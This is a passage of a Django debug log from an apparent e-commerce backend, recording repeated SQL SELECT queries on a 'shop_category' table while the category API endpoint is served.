"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:10:44,319 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:10:44,321 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:10:44,324 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:10:44,326 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:10:44,329 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:10:44,332 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:10:44,334 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:10:44,336 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:10:44,339 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:10:44,342 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:10:44,344 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:10:44,347 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:10:44,349 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:10:44,352 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:10:44,354 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:10:44,357 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:10:44,359 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:10:44,362 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:10:44,364 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:10:44,366 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:10:44,369 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:10:44,372 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:10:44,374 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:10:44,376 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:10:44,378 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:10:44,382 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:10:44,384 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:10:44,386 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:10:44,388 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:10:44,391 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:10:44,393 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:10:44,396 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:10:44,398 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:10:44,400 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:10:44,403 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:10:44,405 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:10:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 11:12:22,784 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:12:22,795 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:12:22,801 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:12:22,805 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:12:22,811 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:12:22,815 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:12:22,819 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:12:22,823 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:12:22,827 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:12:22,833 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:12:22,836 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:12:22,840 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:12:22,844 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:12:22,848 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:12:22,854 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:12:22,858 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:12:22,861 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:12:22,865 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:12:22,869 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:12:22,875 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:12:22,879 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:12:22,883 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:12:22,887 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:12:22,891 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:12:22,895 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:12:22,900 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:12:22,904 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:12:22,908 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:12:22,912 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:12:22,916 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:12:22,921 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:12:22,926 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", 